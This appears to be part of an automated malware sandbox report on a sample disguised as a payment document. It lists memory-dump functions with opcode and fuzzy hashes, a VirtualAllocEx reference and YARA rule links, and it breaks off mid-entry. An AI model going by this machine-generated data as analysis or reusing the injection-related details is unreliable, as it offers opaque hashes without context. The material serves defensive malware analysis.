Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05655DBE

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f1325a182555adc507ee95815d9c4ab5ae9f5727fa787b6c2ab23319af01028a
Instruction ID: 814ee5d1504c60cdfa2d9a176597acf26dfdf1718807d5edb32c64f69aa61e11
Opcode Fuzzy Hash: f1325a182555adc507ee95815d9c4ab5ae9f5727fa787b6c2ab23319af01028a
Instruction Fuzzy Hash: 10116A729003499FDB20DFAAC844BEEBBF5EF48324F108419D915A7250C775A540CFA4

Function 06F2FCB0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F2FCE9

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 9c5b78494b5e6ed8f0f69d9b2920c9de1e5c58808783ffc05b75a250825b2f3e
Instruction ID: cb09d883c43ea82a330983943d2751566fb8af6da400d7d8852c7397be31ade5
Opcode Fuzzy Hash: 9c5b78494b5e6ed8f0f69d9b2920c9de1e5c58808783ffc05b75a250825b2f3e
Instruction Fuzzy Hash: 67217135B101249FCF48AFA4D854A6D7BB7FF8C310B1540A9EA0AAB361DB71DC12CB90

Function 027E1A99 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e7211570f02b3d51abb8aed317ffe3c35d7a5366e35ea17c4172054b662da4
Instruction ID: 1b2759065ef85b6ce4dae73daf2e0501dbbb1b12219b3c186050603a8d417d15
Opcode Fuzzy Hash: 97e7211570f02b3d51abb8aed317ffe3c35d7a5366e35ea17c4172054b662da4
Instruction Fuzzy Hash: 79516A30A00104CFDF14DB69D58ABADB7F7FB8C310F9485A9D00AAB264EB759D45CB60

Function 027E19C4 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14d780d6570ce012194371dcff21ffd673b36f5795b28f4205488ddc56481d84
Instruction ID: bfd21f9415c4ce2705d20f8587368387cd0a4236e9825c64ea616841179e6fe0
Opcode Fuzzy Hash: 14d780d6570ce012194371dcff21ffd673b36f5795b28f4205488ddc56481d84
Instruction Fuzzy Hash: 8B512A34B00605CFDB04CB64C586B6AB3B3FB88310FA885B6D51A9B759D775EC81CBA0

Function 027E1AA8 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1876a0814aa484552552468b4e9074f33de048f10521b0d3915db4eaa61ccef4
Instruction ID: 3b975c54f4048db8418c89e17b2b820e8dc719a8d50c5fcd877fdb948213cf71
Opcode Fuzzy Hash: 1876a0814aa484552552468b4e9074f33de048f10521b0d3915db4eaa61ccef4
Instruction Fuzzy Hash: AC516A30A00104CFDF14DB69D18ABADB7F7FB8C310F9485A5D00AAB2A4EB75AD45CB60

Function 027E1C03 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742d7a586aba2a4f31596a7e827e870dcff24cf0936d4f54f66d2e6cf3200e71
Instruction ID: 68209836e2c4c05795ae7dcd594277603e27b78439a3f69740ac75623aa78539
Opcode Fuzzy Hash: 742d7a586aba2a4f31596a7e827e870dcff24cf0936d4f54f66d2e6cf3200e71
Instruction Fuzzy Hash: 36413A30A00104CFDF14DF69D589BA977F7BB8C300F9485A5D00AAB2A4EBB49D45DB61

Function 027E252C Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f62fe4ea2ad33c425dc9ec87ade494846bd972213c7348355a5f302ede4058b
Instruction ID: 4c3d61b7655d3dc5ccd5398fc9b220e61afca8d15c803431c7491a7cd504837c
Opcode Fuzzy Hash: 2f62fe4ea2ad33c425dc9ec87ade494846bd972213c7348355a5f302ede4058b
Instruction Fuzzy Hash: 433136B1D002499FDB10DFA9D590BEEBFF5EF48344F248029E809AB250DB349945CBA0

Function 027E2538 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 116a5ff1ee52acf8ad7af3eeeb083ad56426c64b5b5b31986e3e11966689508e
Instruction ID: 11fa55a9554980f4d3445b80a7c32bd1159e692ba585ed8c691c8e71b3d1ddc9
Opcode Fuzzy Hash: 116a5ff1ee52acf8ad7af3eeeb083ad56426c64b5b5b31986e3e11966689508e
Instruction Fuzzy Hash: BF3124B1D002599FDF10DFAAD590BEEBFF5EF48344F248429E809AB250DB349941CBA0

Function 027E9F01 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740e2bfbc6b842663254f4a000ac61f7c97f41c045f69833a6af8b9bc2768755
Instruction ID: 788bd241569b4468efa34405aed8e268ae6030f1769b7c0abbe35a95d2c4a50a
Opcode Fuzzy Hash: 740e2bfbc6b842663254f4a000ac61f7c97f41c045f69833a6af8b9bc2768755
Instruction Fuzzy Hash: F03147B0D05208DFDB40DFA9C048BAEBBF2EF4A304F1185B6D116A7255E7345A85CB62

Function 027E9F10 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee99d1d9d37bd2a01cf2cf4e1861e9d0450f80c6f95dda89e4340cd783e1693
Instruction ID: 1e486ac7c42270d6e0e4661a1a8fb08fa09afa9ae1b8604164f0717339fb8ac8
Opcode Fuzzy Hash: cee99d1d9d37bd2a01cf2cf4e1861e9d0450f80c6f95dda89e4340cd783e1693
Instruction Fuzzy Hash: 59314AB0D05208DFDB40DFA9C048BAEBBF6EB4E304F1181B5D11AA7245D7345A80CB62

Function 06F2B1C0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afdc165520450586638998d0c79798bc47f3856fabbea306840fb608ad0c4c63
Instruction ID: 4c4ad54eed2c5e6d1a03b4e06051991d4af46ce16cf4231a89776a15aefb6d87
Opcode Fuzzy Hash: afdc165520450586638998d0c79798bc47f3856fabbea306840fb608ad0c4c63
Instruction Fuzzy Hash: 16217AB1E0421A8FEB05CFA9D9446EEBBF5EB89304F148065CA15E3290D7749A40CF91

Function 00BAD01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625845192.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81652c1b1d057680ad1a59e9886faa35d77602325e33b4396103411f6f718790
Instruction ID: e4631e6979211e310f6be6ab1d787e8015ac908707148b46708a948c00d645d0
Opcode Fuzzy Hash: 81652c1b1d057680ad1a59e9886faa35d77602325e33b4396103411f6f718790
Instruction Fuzzy Hash: 73214971508240DFDB24DF10D9D4B27BBA5FB85314F20C6A9E80A4B652C336D847CBA2

Function 00BAD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625845192.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68817f137190cf59f09fc61006a41a24ee49a842145647537b5b747e999be800
Instruction ID: 273bbed625e4ae40ee5d5d6218938b5dce63d20a5f78a8e25ce930b280552ebb
Opcode Fuzzy Hash: 68817f137190cf59f09fc61006a41a24ee49a842145647537b5b747e999be800
Instruction Fuzzy Hash: 8721A4755093808FCB16CF10D994B15BFB1FB86314F2881EAD8458B657C33AD81ACB62

Function 027EF5B8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e334d3324e22349da01e9bc6bed006461c709294ac905584f386b24a95a61ba1
Instruction ID: a445635c4e0c7d9745ac39d1c3f74b12b22804b12e4916dd40d16bb687fdc75a
Opcode Fuzzy Hash: e334d3324e22349da01e9bc6bed006461c709294ac905584f386b24a95a61ba1
Instruction Fuzzy Hash: B91123B1E04219CBCF14CFA9D8446EEBBBAFB8C310F10802AD506B3A50D7345A55CFA1

Function 06F29EB0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4052038f87060ffb5b6c0ea41188404d4e595d10c99bd581803c4789d1ab12
Instruction ID: 9da8dc683e73bd352f86ca5a055e11e63cae975f1118c3202f9381e818b05409
Opcode Fuzzy Hash: ec4052038f87060ffb5b6c0ea41188404d4e595d10c99bd581803c4789d1ab12
Instruction Fuzzy Hash: 86219074E0520ADFCB84DFA8C144AAEBBF5FF49304F1084AAD919A7354DB359A41CFA1

Function 00B9D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625744387.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b9d000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de9c3bf7958eaac326ee78acf6cf378fd5185c68ed0ec8c73d9f1ab401eacbb
Instruction ID: d91ea04caa39eb5795e48feb4fd272b06da34b514ef5688245ad0ee5db27b003
Opcode Fuzzy Hash: 2de9c3bf7958eaac326ee78acf6cf378fd5185c68ed0ec8c73d9f1ab401eacbb
Instruction Fuzzy Hash: FC01A7315053449AEB204A66D8C4767FBD8EF41724F18C5AAED094A282C37CDC40CA72

Function 06F2B378 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad94edcd2ca29cd929ad196d85d26c3cc0893546c3e997ba3e07c788fc623b4
Instruction ID: bbdd5ebce48239ef1f71fc7da1ab0444d7e1713c342f576e8f2f919b57d97ab3
Opcode Fuzzy Hash: cad94edcd2ca29cd929ad196d85d26c3cc0893546c3e997ba3e07c788fc623b4
Instruction Fuzzy Hash: 1EF0EC71E5561ADFDB94EFE9C8562ADB7F9BF49204F0094A9C819D7250FB709A00CF40

Function 00B9D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625744387.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b9d000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca0078459d89b55e15af2d0005fa5a5710be7aa3b09b93451e579423e282f48
Instruction ID: 572b6556ddb797b04e76c3040be79c3e38117db790ed8c0497213942b1e01a6b
Opcode Fuzzy Hash: dca0078459d89b55e15af2d0005fa5a5710be7aa3b09b93451e579423e282f48
Instruction Fuzzy Hash: F8F06D72405344AEEB208A16D8C4B62FFE8EB51724F18C5AAED484F686C3799C44CAB1

Function 027E0860 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63443e1dbfbf52b2da9df570206855a4274170d633363414b784caf27ac0109e
Instruction ID: 56fc4569d802bb71558f9148f2721728c1ff77f7ad7ea1546e881e061d8e96ad
Opcode Fuzzy Hash: 63443e1dbfbf52b2da9df570206855a4274170d633363414b784caf27ac0109e
Instruction Fuzzy Hash: FCF0DF6609E3C18FD3035B709830986BF706E4721076E82EFD4C5CF8B3E628495AC322

Function 06F10DF6 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aaeda41c9678682022b4d42aec5ce803cf16cce077100feddabba93597be53d
Instruction ID: 67c05e9953f5c2111e15bc2b669d851b0c7f41e8b428d62461fe67ac9dbc802c
Opcode Fuzzy Hash: 2aaeda41c9678682022b4d42aec5ce803cf16cce077100feddabba93597be53d
Instruction Fuzzy Hash: 2A01E878A042188FCB68EF58C888AD9B7F2FB4D300F1081D5E909AB355CB309E80CF91

Function 06F12657 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e4a2e238dcdc26f93426f85d704ed214d5be5822214975746ea265af726aa1
Instruction ID: a69786d16ada10bdda8f08ef43dd8748209b923f2d38e0096646c138960247d4
Opcode Fuzzy Hash: c1e4a2e238dcdc26f93426f85d704ed214d5be5822214975746ea265af726aa1
Instruction Fuzzy Hash: C4014F38D05228CFDB64DF14D858A9AB7F1FB49704F1080E5E549A7348CB389E81CF91

Function 027EF398 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de738495808165fcac525d6cba10e91b8282566c2fce4c2f5f207cdc41725f44
Instruction ID: 10c74d34d668e1c7b3a03c00966f30193142a350630fba41c536079cdf042a38
Opcode Fuzzy Hash: de738495808165fcac525d6cba10e91b8282566c2fce4c2f5f207cdc41725f44
Instruction Fuzzy Hash: A0F01535E04208EFCB80DFA8C841A9CBBB5EB48300F10C0AADC09A3350D7359A11DF41

Function 027E192F Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f96d879d9332b06a518530c37fb36911c882f2190f4ae24444efd48b58bebbb
Instruction ID: 49f3f51ff4f45a04187f9111baaf288f9adcedc95cdf41df83e8e54160579d73
Opcode Fuzzy Hash: 6f96d879d9332b06a518530c37fb36911c882f2190f4ae24444efd48b58bebbb
Instruction Fuzzy Hash: 2FE0E5783002018FDB04DB54C595B6ABB62BB88310FA586A4D5469F39AD772EC81CBA5

Function 06F25AE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
Instruction ID: 97c65986d69bba692d068d49609d7ed642761a4411752b4baef58b4d23aa2187
Opcode Fuzzy Hash: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
Instruction Fuzzy Hash: 95E0E574E04208EFCB84DFA8D941AACFBF4EB49300F10C0AA9808A3351D6359A55DF80

Function 06F2A140 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
Instruction ID: c07fcbb0da35254561625fe8403ebdd7794a21c3352ea9e8c2f20ec6d97f0b73
Opcode Fuzzy Hash: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
Instruction Fuzzy Hash: 3AE0E574E04208EFCB84DFA8D941AADFBF5EB49310F10C0AA9818A3351D6359E51EF80

Function 06F2CD48 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
Instruction ID: 974506a977acaf1ce74190be2833dffdd64d8da04ae3b9ff7ddff735af395772
Opcode Fuzzy Hash: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
Instruction Fuzzy Hash: 0AE0E574E44208EFCB94DFA8D941AACFBF5EB49300F20C0AA9859A3351D7359A51DF80

Function 06F29E60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
Instruction ID: c35609a01b177b60235ef5f45c6c7393ee969f041d5df1cfd87762d180c72c47
Opcode Fuzzy Hash: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
Instruction Fuzzy Hash: 3FE0E574E04208EFCB84DFA9D5416ACBBF4FB89204F10C0A9881893351D6759A01DF81

Function 06F29FA8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
Instruction ID: dcec8bab8a252b3b79efcd5d3b7566e6eb36ba08c4466008045f40328e962a7d
Opcode Fuzzy Hash: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
Instruction Fuzzy Hash: 75E0E574E05208EFCB84EFA9D5416ADBBF4EB49200F10C0A9980893341D675AA02DF80

Function 06F2FF60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
Instruction ID: d4ab8937ca94e06f025ad27602ed23b42c274bcffc90aa47e58b93528c001232
Opcode Fuzzy Hash: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
Instruction Fuzzy Hash: 20E01A74E55208EFCB84DFA8D5416ADFBF4EB49304F10C1A9D81893341D635AE02DF81

Function 06F2FAF0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e2b601da7909d67bdbf47d79c9cb6940c83d43bde11daa461d6941e29a219c
Instruction ID: 120ea7bf348732f9d8f7832df091dd01106b34a02a2c15fadfff22b5bd5b6c67
Opcode Fuzzy Hash: c0e2b601da7909d67bdbf47d79c9cb6940c83d43bde11daa461d6941e29a219c
Instruction Fuzzy Hash: 48E08C75D49219EFC744DFA8D951AADBBB8AB4A300F10C0ADD94857381CA329A42EF94

Function 06F2F6D8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
Instruction ID: 78975ccec0ae94f2685bb512afea286ca7c3a02661560ebc6e4bfd47456b4f8f
Opcode Fuzzy Hash: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
Instruction Fuzzy Hash: F1E04F34D4525CEFC754DF98D5416ACFBB8EB4A214F20C1E9C80953351CA355E41DF81

Function 06F28768 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
Instruction ID: c14bd295b5eb6089a5a796c386d765eadbb4c0c89324e8c9dfba3dd7b2f51f7a
Opcode Fuzzy Hash: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
Instruction Fuzzy Hash: 58E01A34E04208AFC744DF98D5416ACBBB9AB49200F14C0A9881853341DA355A05EF80

Function 027EE370 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e06a167447c94fe818f2b8d7a707c3517964ca15e17a0bbe53a395f91a60568
Instruction ID: bd94878764a82dd096f8e9d33359f3190fa99a5452ec141d913b5cf9fdc93191
Opcode Fuzzy Hash: 3e06a167447c94fe818f2b8d7a707c3517964ca15e17a0bbe53a395f91a60568
Instruction Fuzzy Hash: A5E0C271801208EBC740EFF4D90478E77F9DB0A311F0044A6D30A97150EE718A00D7A5

Function 06F2DB90 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1effcf203f0b2316d8bfca6d29a34bddee80329204eca0cc0280629d980ced4
Instruction ID: 42e7efa14031766963425261e303baa197f94d77a8235c2171229f84d800e1cd
Opcode Fuzzy Hash: a1effcf203f0b2316d8bfca6d29a34bddee80329204eca0cc0280629d980ced4
Instruction Fuzzy Hash: 46E01234D09209EBC748EF94D9515ACBBB8EF86304F20D199C80817355DB315E46DB95

Function 06F11A9A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52db94475119399ef21519bbd84599987ec802c5cb697616c3293f08ab60437
Instruction ID: 80dcc0dadbdcc40e560513a4227aad8f74fc04139db57e63a57ceccbca01a56d
Opcode Fuzzy Hash: e52db94475119399ef21519bbd84599987ec802c5cb697616c3293f08ab60437
